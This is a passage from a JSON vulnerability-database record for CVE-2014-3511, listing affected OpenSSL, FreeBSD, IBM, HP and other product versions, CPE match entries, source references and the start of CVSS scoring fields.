0.3, "vendor": "ibm", "version": "4.1" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1x" }, { "model": "9.3-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "8.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "8.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.5" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "beta4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35307160" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "insight control", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "7.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "server migration pack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc5022 16gb san scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "7.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "release p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3--" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "5.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p10", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087180" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "server migration pack", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.14" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408956" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.17" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8807903" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.32" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36305466" }, { "model": "-release-p17", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "7.0-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "qradar risk manager mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x4407917" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36505460" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087220" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "matrix operating environment", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "storage server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.5" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.0d5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "8.2-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "-release-p42", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "6.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.30" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "6.4-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.07" } ], "sources": [ { "db": "BID", "id": "69079" }, { "db": "NVD", "id": "CVE-2014-3511" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3511" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "130299" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "131254" } ], "trust": 1.0 }, "cve": "CVE-2014-3511", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": 